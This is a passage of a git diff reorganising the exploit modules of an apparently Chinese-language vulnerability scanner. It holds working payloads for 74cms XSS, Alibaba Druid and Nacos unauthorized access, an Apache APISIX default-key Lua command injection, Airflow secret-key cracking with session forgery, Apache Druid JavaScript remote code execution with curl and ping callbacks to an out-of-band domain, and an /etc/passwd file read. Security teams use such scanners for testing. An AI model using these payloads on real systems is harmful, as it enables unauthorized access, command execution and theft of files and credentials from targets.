'index.php?m=&c=help&a=help_list&key=1%253csvg/onload%253dconfirm%2528{TEXT}%2529%253E2&__hash__=1'}, + {'path': 'index.php?m=&c=help&a=help_list&key=137244gq1lw%253csvg/onload%253dconfirm%2528{TEXT}%2529%253Edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': '74cms', + 'vul_type': 'XSS', + 'vul_id': '74cms-v6.0.4-xss', + } + + for payload in self.payloads: + path = payload['path'].format(TEXT=randomNum) + + res = client.request( + 'get', + path, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + md = '' + + if (md in res.text): + results = { + 'Target': res.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AlibabaDruid/alibaba-druid-unauth.py b/payloads/AlibabaDruid/alibaba-druid-unauth.py new file mode 100644 index 0000000..71ddfc0 --- /dev/null +++ b/payloads/AlibabaDruid/alibaba-druid-unauth.py @@ -0,0 +1,71 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +druid未授权访问漏洞 + 攻击者可利用druid管理面板, 查看Session信息, 并利用泄露的Session登录后台(有时候可能没有Session) + 暂无编号 +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': ''}, + {'path': 'druid/index.html'}, + {'path': 'druid/api.html'}, + {'path': 'index.html'}, + {'path': 'api.html'}, + # {'path': 'druid/datasource.html'}, + # {'path': 'druid/sql.html'}, + # {'path': 'druid/wall.html'}, + # {'path': 'druid/basic.json'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') # * Requests Client + + vul_info = { + 'app_name': 'AlibabaDruid', + 'vul_type': 'unAuthorized', + 'vul_id': 'alibaba-druid-unauth', + } + + for payload in self.payloads: # * Payload + path = payload['path'] # * Path + + res = client.request( + 'get', + path, + vul_info=vul_info + ) + if res is None: + continue + + if ( + (('Druid Stat Index' in res.text) + and ('druid.index' in res.text)) + or (('Druid Stat JSON API' in res.text) + and ('druid.common' in res.text)) + # or (('Druid DataSourceStat' in res.text) + # and ('druid.datasource' in res.text)) + # or (('Druid SQL Stat' in res.text) + # and ('druid.sql' in res.text)) + # or (('Druid DataSourceStat' in res.text) + # and ('druid.wall' in res.text)) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) + \ No newline at end of file diff --git a/payloads/AlibabaDruid/main.py b/payloads/AlibabaDruid/main.py deleted file mode 100644 index 7e4d1e9..0000000 --- a/payloads/AlibabaDruid/main.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - AlibabaDruid扫描类: - druid 未授权访问 - 暂无编号 -''' - -# from lib.initial.config import config -# from lib.tool.md5 import md5 -from lib.tool.thread import thread -from payloads.AlibabaDruid.unauth import unauth_scan - -class Druid(): - def __init__(self): - self.app_name = 'AlibabaDruid' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=unauth_scan, clients=clients), - ] - -alidruid = Druid() \ No newline at end of file diff --git a/payloads/AlibabaDruid/unauth.py b/payloads/AlibabaDruid/unauth.py deleted file mode 100644 index cf307dd..0000000 --- a/payloads/AlibabaDruid/unauth.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -unauth_payloads = [ - {'path': ''}, - {'path': 'druid/index.html'}, - {'path': 'druid/api.html'}, - {'path': 'index.html'}, - {'path': 'api.html'}, - # {'path': 'druid/datasource.html'}, - # {'path': 'druid/sql.html'}, - # {'path': 'druid/wall.html'}, - # {'path': 'druid/basic.json'}, - -] - -def unauth_scan(clients): - ''' druid未授权访问漏洞 - 攻击者可利用druid管理面板, 查看Session信息, 并利用泄露的Session登录后台(有时候可能没有Session) - ''' - client = clients.get('reqClient') # * Requests Client - - vul_info = { - 'app_name': 'AlibabaDruid', - 'vul_type': 'unAuthorized', - 'vul_id': 'druid-unauth', - } - - for payload in unauth_payloads: # * Payload - path = payload['path'] # * Path - - res = client.request( - 'get', - path, - vul_info=vul_info - ) - if res is None: - continue - - if ( - (('Druid Stat Index' in res.text) - and ('druid.index' in res.text)) - or (('Druid Stat JSON API' in res.text) - and ('druid.common' in res.text)) - # or (('Druid DataSourceStat' in res.text) - # and ('druid.datasource' in res.text)) - # or (('Druid SQL Stat' in res.text) - # and ('druid.sql' in res.text)) - # or (('Druid DataSourceStat' in res.text) - # and ('druid.wall' in res.text)) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py b/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py new file mode 100644 index 0000000..f0c877a --- /dev/null +++ b/payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +阿里巴巴Nacos未授权访问漏洞 + 可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台 + CVE-2021-29441(nacos-4593) + Payload: https://github.com/alibaba/nacos/issues/4593 +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10', + 'headers': {'User-Agent': 'Nacos-Server'} + }, + { + 'path': 'v1/auth/users?pageNo=1&pageSize=10', + 'headers': {'User-Agent': 'Nacos-Server'} + }, + { + 'path': 'auth/users?pageNo=1&pageSize=10', + 'headers': {'User-Agent': 'Nacos-Server'} + }, + { + 'path': 'users?pageNo=1&pageSize=10', + 'headers': {'User-Agent': 'Nacos-Server'} + }, + { + 'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10', + 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, 会被WAF拦截, 所以为空 + }, + { + 'path': 'v1/auth/users?pageNo=1&pageSize=10', + 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 + }, + { + 'path': 'auth/users?pageNo=1&pageSize=10', + 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 + }, + { + 'path': 'users?pageNo=1&pageSize=10', + 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 + } + # { 利用漏洞创建后台用户 + # 'path': '/nacos/v1/auth/users?username=XXX&password=XXX', + # 'data': '' + # } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AlibabaNacos', + 'vul_type': 'unAuthorized', + 'vul_id': 'CVE-2021-29441', + } + + for payload in self.payloads: # * Payload + path = payload['path'] # * Path + headers = payload['headers'] # * Headers + + res = client.request( + 'get', + path, + headers=headers, + vul_info=vul_info + ) + if res is None: + continue + + if ( + ('"username":"nacos","password"' in res.text) + or ('"username":"nacos", "password"' in res.text) + or (('pageNumber' in res.text) + and ('totalCount' in res.text) + and ('pagesAvailable' in res.text) + and ('pageItems' in res.text)) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Exploit': { + 'Method': 'POST', + 'Path': 'nacos/v1/auth/users?username=Username&password=123456a!' + }, + 'Request': res, + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AlibabaNacos/cve_2021_29441.py b/payloads/AlibabaNacos/cve_2021_29441.py deleted file mode 100644 index d8a654e..0000000 --- a/payloads/AlibabaNacos/cve_2021_29441.py +++ /dev/null @@ -1,86 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -cve_2021_29441_payloads = [ - { - 'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10', - 'headers': {'User-Agent': 'Nacos-Server'} - }, - { - 'path': 'v1/auth/users?pageNo=1&pageSize=10', - 'headers': {'User-Agent': 'Nacos-Server'} - }, - { - 'path': 'auth/users?pageNo=1&pageSize=10', - 'headers': {'User-Agent': 'Nacos-Server'} - }, - { - 'path': 'users?pageNo=1&pageSize=10', - 'headers': {'User-Agent': 'Nacos-Server'} - }, - { - 'path': 'nacos/v1/auth/users?pageNo=1&pageSize=10', - 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, 会被WAF拦截, 所以为空 - }, - { - 'path': 'v1/auth/users?pageNo=1&pageSize=10', - 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 - }, - { - 'path': 'auth/users?pageNo=1&pageSize=10', - 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 - }, - { - 'path': 'users?pageNo=1&pageSize=10', - 'headers': {} # * 有时候数据包带User-Agent: Nacos-Server头时, Payload会无效 - } - # { 利用漏洞创建后台用户 - # 'path': '/nacos/v1/auth/users?username=XXX&password=XXX', - # 'data': '' - # } -] - -def cve_2021_29441_scan(clients): - ''' 阿里巴巴Nacos未授权访问漏洞 - 可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AlibabaNacos', - 'vul_type': 'unAuthorized', - 'vul_id': 'CVE-2021-29441', - } - - for payload in cve_2021_29441_payloads: # * Payload - path = payload['path'] # * Path - headers = payload['headers'] # * Headers - - res = client.request( - 'get', - path, - headers=headers, - vul_info=vul_info - ) - if res is None: - continue - - if ( - ('"username":"nacos","password"' in res.text) - or ('"username":"nacos", "password"' in res.text) - or (('pageNumber' in res.text) - and ('totalCount' in res.text) - and ('pagesAvailable' in res.text) - and ('pageItems' in res.text)) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Exploit': { - 'Method': 'POST', - 'Path': 'nacos/v1/auth/users?username=Username&password=123456a!' - }, - 'Request': res, - } - return results - return None diff --git a/payloads/AlibabaNacos/main.py b/payloads/AlibabaNacos/main.py deleted file mode 100644 index 781cd6a..0000000 --- a/payloads/AlibabaNacos/main.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - AlibabaNacos扫描类: - Nacos 未授权访问 - CVE-2021-29441(nacos-4593) - https://github.com/alibaba/nacos/issues/4593 -''' - -from lib.tool.thread import thread -from payloads.AlibabaNacos.cve_2021_29441 import cve_2021_29441_scan - -class Nacos(): - def __init__(self): - self.app_name = 'AlibabaNacos' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2021_29441_scan, clients=clients), - ] - -nacos = Nacos() \ No newline at end of file diff --git a/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py b/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py new file mode 100644 index 0000000..662a26a --- /dev/null +++ b/payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py @@ -0,0 +1,109 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache APISIX默认密钥漏洞 + 在用户未指定管理员Token或使用了默认配置文件的情况下 + Apache APISIX将使用默认的管理员Token: edd1c9f034335f136f87ad84b625c8f1 + 攻击者利用这个Token可以访问到管理员接口, 进而通过script参数来插入任意LUA脚本并执行 + CVE-2020-13945 + Payload: https://vulhub.org/#/environments/apisix/CVE-2020-13945/ +''' + +from PluginManager import Vuln_Scan +from lib.tool.md5 import random_md5, random_int_2 +from time import sleep + +class Scan(Vuln_Scan): + def __init__(self): + random_path = random_md5(6) + payloads_data = { + "uri": "/" + random_path, + "script": "local _M = {} \n function _M.access(conf, ctx) \n local f = assert(io.popen('RCECOMMAND', 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", + "upstream": { + "type": "roundrobin", + "nodes": { + "example.com:80": 1 + } + } + } + + self.RANNUM1, self.RANNUM2 = random_int_2(6) + self.RCECOMMAND = f'expr {self.RANNUM1} + {self.RANNUM2}' + + self.payloads = [ + { + 'path': 'apisix/admin/routes', + 'data': payloads_data, + 'path2': random_path + }, + { + 'path': 'admin/routes', + 'data': payloads_data, + 'path2': random_path + }, + { + 'path': 'routes', + 'data': payloads_data, + 'path2': random_path + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheAPISIX', + 'vul_type': 'unAuthorized', + 'vul_id': 'CVE-2020-13945', + } + + headers = { + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', # * 默认密钥 + 'Content-Type': 'application/json' + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + data['script'] = data['script'].replace('RCECOMMAND', self.RCECOMMAND) # * 替换RCE命令 + + res1 = client.request( + 'post', + path, + json=data, + headers=headers, + vul_info=vul_info + ) + if res1 is None: + continue + + # and ('update_time' in res1.text) + if ((res1.status_code == 201) and ('create_time' in res1.text)): + sleep(3) # * 创建可能有延迟 + + res2 = client.request( + 'get', + payload['path2'], + vul_info=vul_info + ) + if res2 is None: + continue + + if (str(self.RANNUM1 + self.RANNUM2) in res2.text): + results = { + 'Target': res1.request.url, + 'Verify': res2.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Exploit': 'https://vulhub.org/#/environments/apisix/CVE-2020-13945/', + 'Request-1': res1, + 'Request-2': res2 + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheAPISIX/cve_2020_13945.py b/payloads/ApacheAPISIX/cve_2020_13945.py deleted file mode 100644 index a229764..0000000 --- a/payloads/ApacheAPISIX/cve_2020_13945.py +++ /dev/null @@ -1,96 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -from lib.tool import check -from time import sleep - -random_path = random_md5(6) - -payloads_data = { - "uri": "/" + random_path, - "script": "local _M = {} \n function _M.access(conf, ctx) \n local f = assert(io.popen('RCECOMMAND', 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", - "upstream": { - "type": "roundrobin", - "nodes": { - "example.com:80": 1 - } - } -} - -cve_2020_13945_payloads = [ - { - 'path': 'apisix/admin/routes', - 'data': payloads_data, - 'path2': random_path - }, - { - 'path': 'admin/routes', - 'data': payloads_data, - 'path2': random_path - }, - { - 'path': 'routes', - 'data': payloads_data, - 'path2': random_path - } -] - -def cve_2020_13945_scan(clients): - ''' 在用户未指定管理员Token或使用了默认配置文件的情况下 - Apache APISIX将使用默认的管理员Token: edd1c9f034335f136f87ad84b625c8f1 - 攻击者利用这个Token可以访问到管理员接口, 进而通过script参数来插入任意LUA脚本并执行 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheAPISIX', - 'vul_type': 'unAuthorized', - 'vul_id': 'CVE-2020-13945', - } - - headers = { - 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', # * 默认密钥 - 'Content-Type': 'application/json' - } - - for payload in cve_2020_13945_payloads: - random_num = random_md5(6) # * 获取随机32位md5值, 取前6位 - RCECOMMAND = 'echo ' + random_num # * echo - - path = payload['path'] - data = payload['data'] - data['script'] = data['script'].replace('RCECOMMAND', RCECOMMAND) # * 替换RCE命令 - - res1 = client.request( - 'post', - path, - json=data, - headers=headers, - vul_info=vul_info - ) - if res1 is None: - continue - - # and ('update_time' in res1.text) - if ((res1.status_code == 201) and ('create_time' in res1.text)): - sleep(3) # * 创建可能有延迟 - - res2 = client.request( - 'get', - payload['path2'], - vul_info=vul_info - ) - if res2 is None: - continue - - if (check.check_res(res2.text, random_num)): - results = { - 'Target': res1.request.url, - 'Verify': res2.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request-1': res1, - 'Request-2': res2 - } - return results - return None diff --git a/payloads/ApacheAPISIX/main.py b/payloads/ApacheAPISIX/main.py deleted file mode 100644 index 40d7c31..0000000 --- a/payloads/ApacheAPISIX/main.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -Apache APISIX是一个高性能API网关 - ApacheAPISIX扫描类: - Apache APISIX默认密钥漏洞 - CVE-2020-13945 -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheAPISIX.cve_2020_13945 import cve_2020_13945_scan - -class APISIX(): - def __init__(self): - self.app_name = 'ApacheAPISIX' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_13945_scan, clients=clients) - ] - -apisix = APISIX() \ No newline at end of file diff --git a/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py b/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py new file mode 100644 index 0000000..19e086a --- /dev/null +++ b/payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py @@ -0,0 +1,116 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Airflow身份验证绕过漏洞 + Airflow 使用默认会话密钥, 这会导致在启用身份验证时冒充任意用户 + CVE-2020-17526 + Payload: https://vulhub.org/#/environments/airflow/CVE-2020-17526/ +''' + +from PluginManager import Vuln_Scan +from thirdparty import flask_unsign +import re + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'admin/airflow/login', + 'path2': 'admin/', + }, + { + 'path': 'airflow/login', + 'path2': 'airflow/', + }, + { + 'path': 'login', + 'path2': '', + }, + { + 'path': '', + 'path2': '', + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheAirflow', + 'vul_type': 'unAuthorized', + 'vul_id': 'CVE-2020-17526', + } + + headers = {} + + for payload in self.payloads: # * Payload + path = payload['path'] # * Path + + res1 = client.request( + 'get', + path, + allow_redirects=False, + vul_info=vul_info + ) + if res1 is None: + continue + + if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)): # * 判断响应包中是否有Set-Cookie + set_cookie = res1.headers['Set-Cookie'] + flask_cookie = re.search(r'.{76}\.{1}.{6}\.{1}.{27}', set_cookie) # * 是否存在Flask Cookie + if flask_cookie: + cookie = flask_cookie.group() # * 获取Flask Cookie + c = flask_unsign.Cracker(cookie, quiet=True) # * 使用获取的Cookie创建Cracker对象 + file = open('lib/db/secretKey_fast.txt', encoding='utf-8') # * secret密钥字典 + secretKeys = file.readlines() + file.close() + + for key in range(len(secretKeys)): # * 去除\n + secretKeys[key] = secretKeys[key].replace('\n', '') + + secretKey = c.crack(secretKeys) # * 开始暴破secret + + if secretKey: # * 如果暴破成功, 会返回密钥, 否则为None + session = flask_unsign.sign( # * 利用secret伪造session + {'user_id': '1', '_fresh': False, '_permanent': True}, + secretKey + ) + flask_session = { # * 设置session + 'Cookie': 'session=' + session + } + headers.update(flask_session) # * 更新headers + res2 = client.request( + 'get', + payload['path2'], + headers=headers, + vul_info=vul_info + ) + if res2 is None: + continue + + if ((res2.status_code == 200) + and ( + ('Airflow - DAGs' in res2.text) + or (('Schedule' in res2.text) + and ('Recent Tasks' in res2.text)) + or (('const DAGS_INDEX =' in res2.text) + and ('window.location = DAGS_INDEX + "?search="+ encodeURI(search_query);' in res2.text)) + ) + ): + results = { + 'Target': res2.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Secret Key': secretKey, + 'Cookie': flask_session['Cookie'], + # 'Request-1': res1, + 'Request': res2 + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheAirflow/cve_2020_17526.py b/payloads/ApacheAirflow/cve_2020_17526.py deleted file mode 100644 index 9520419..0000000 --- a/payloads/ApacheAirflow/cve_2020_17526.py +++ /dev/null @@ -1,101 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from thirdparty import flask_unsign -import re - -cve_2020_17526_payloads = [ - { - 'path': 'admin/airflow/login', - 'path2': 'admin/', - }, - { - 'path': 'airflow/login', - 'path2': 'airflow/', - }, - { - 'path': 'login', - 'path2': '', - }, - { - 'path': '', - 'path2': '', - } -] - -def cve_2020_17526_scan(clients): - ''' Airflow 使用默认会话密钥, 这会导致在启用身份验证时冒充任意用户 ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheAirflow', - 'vul_type': 'unAuthorized', - 'vul_id': 'CVE-2020-17526', - } - - headers = {} - - for payload in cve_2020_17526_payloads: # * Payload - path = payload['path'] # * Path - - res1 = client.request( - 'get', - path, - allow_redirects=False, - vul_info=vul_info - ) - if res1 is None: - continue - - if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)): # * 判断响应包中是否有Set-Cookie - set_cookie = res1.headers['Set-Cookie'] - flask_cookie = re.search(r'.{76}\.{1}.{6}\.{1}.{27}', set_cookie) # * 是否存在Flask Cookie - if flask_cookie: - cookie = flask_cookie.group() # * 获取Flask Cookie - c = flask_unsign.Cracker(cookie, quiet=True) # * 使用获取的Cookie创建Cracker对象 - file = open('lib/db/secretKey_fast.txt', encoding='utf-8') # * secret密钥字典 - secretKeys = file.readlines() - file.close() - - for key in range(len(secretKeys)): # * 去除\n - secretKeys[key] = secretKeys[key].replace('\n', '') - - secretKey = c.crack(secretKeys) # * 开始暴破secret - - if secretKey: # * 如果暴破成功, 会返回密钥, 否则为None - session = flask_unsign.sign( # * 利用secret伪造session - {'user_id': '1', '_fresh': False, '_permanent': True}, - secretKey - ) - flask_session = { # * 设置session - 'Cookie': 'session=' + session - } - headers.update(flask_session) # * 更新headers - res2 = client.request( - 'get', - payload['path2'], - headers=headers, - vul_info=vul_info - ) - if res2 is None: - continue - - if ((res2.status_code == 200) - and ( - ('Airflow - DAGs' in res2.text) - or (('Schedule' in res2.text) - and ('Recent Tasks' in res2.text)) - or (('const DAGS_INDEX =' in res2.text) - and ('window.location = DAGS_INDEX + "?search="+ encodeURI(search_query);' in res2.text)) - ) - ): - results = { - 'Target': res2.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Secret Key': secretKey, - 'Cookie': flask_session['Cookie'], - # 'Request-1': res1, - 'Request': res2 - } - return results - return None diff --git a/payloads/ApacheAirflow/main.py b/payloads/ApacheAirflow/main.py deleted file mode 100644 index 1616c7c..0000000 --- a/payloads/ApacheAirflow/main.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - ApacheAirflow扫描类: - Airflow 身份验证绕过漏洞 - CVE-2020-17526 - Payload: https://vulhub.org/#/environments/airflow/CVE-2020-17526/ - -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -# from lib.tool.md5 import md5 -from lib.tool.thread import thread -from payloads.ApacheAirflow.cve_2020_17526 import cve_2020_17526_scan - -class Airflow(): - def __init__(self): - self.app_name = 'ApacheAirflow' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_17526_scan, clients=clients) - ] - -airflow = Airflow() \ No newline at end of file diff --git a/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py b/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py new file mode 100644 index 0000000..7bd8301 --- /dev/null +++ b/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py @@ -0,0 +1,109 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache Druid 远程代码执行 + CVE-2021-25646 + Payload: https://www.freebuf.com/vuls/263276.html + https://cloud.tencent.com/developer/article/1797515 + +Apache Druid 包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码, + 此功能在用于高信任度环境中, 默认已被禁用 + 但是, 在 Druid 0.20.0及更低版本中, + 经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求, + 利用 Apache Druid 漏洞可以执行任意代码 +''' + +from PluginManager import Vuln_Scan +from lib.api.dns import dns +from lib.tool.md5 import random_md5 +from lib.tool import check + +class Scan(Vuln_Scan): + def __init__(self): + # * 有回显/无回显 Payload + cve_2021_25646_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "%%DATASOURCE%%","parser": {"parseSpec": {"format": "javascript","timestampSpec": {},"dimensionsSpec": {},"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\A\\").next();return {timestamp:\\"2013-09-01T12:41:27Z\\",test: s}}","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 10}}''' + cve_2021_25646_no_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('COMMAND')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":5,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}''' + + self.random_str = random_md5(6) # * 随机6位字符串 + + self.payloads = [ + # ! 回显POC + { + 'path': 'druid/indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + self.random_str) + }, + { + 'path': 'indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + self.random_str) + }, + # ! 无回显POC + { + 'path': 'druid/indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_no_data.replace('COMMAND', 'curl DNSDOMAIN') + }, + { + 'path': 'druid/indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_no_data.replace('COMMAND', 'curl http://DNSDOMAIN') + }, + { + 'path': 'druid/indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_no_data.replace('COMMAND', 'ping -c 4 DNSDOMAIN') + }, + { + 'path': 'druid/indexer/v1/sampler?for=filter', + 'data': cve_2021_25646_no_data.replace('COMMAND', 'ping DNSDOMAIN') + }, + ] + + def POC(self, clients): + client = clients.get('reqClient') + sessid = '244d164411e9b78ca7074ec47f2c4f96' + + vul_info = { + 'app_name': 'ApacheDruid', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2021-25646', + } + + headers = { + 'Content-Type': 'application/json;charset=utf-8', + 'Referer': client.protocol_domain, + 'Origin': client.protocol_domain, + } + + for payload in self.payloads: + dns_md = random_md5() # * 随机md5值, 8位 + dns_domain = dns_md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = payload['path'] + data = payload['data'].replace('DNSDOMAIN', dns_domain) + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res(res.text, self.random_str) + or dns.result(dns_md, sessid) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) + diff --git a/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py b/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py new file mode 100644 index 0000000..bf0c6b1 --- /dev/null +++ b/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Apache Druid任意文件读取 + CVE-2021-36749 + Payload: https://cloud.tencent.com/developer/article/1942458 + +Apache Druid对用户指定的HTTP InputSource没有做限制, + 并且Apache Druid默认管理页面是不需要认证即可访问的 + 因此未经授权的远程攻击者 可以通过构造恶意参数读取服务器上的任意文件 + Apache Druid <= 0.21.1 +''' + +from PluginManager import Vuln_Scan +from lib.tool import check + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'druid/indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + { + 'path': 'druid/indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + { + 'path': 'druid/indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": 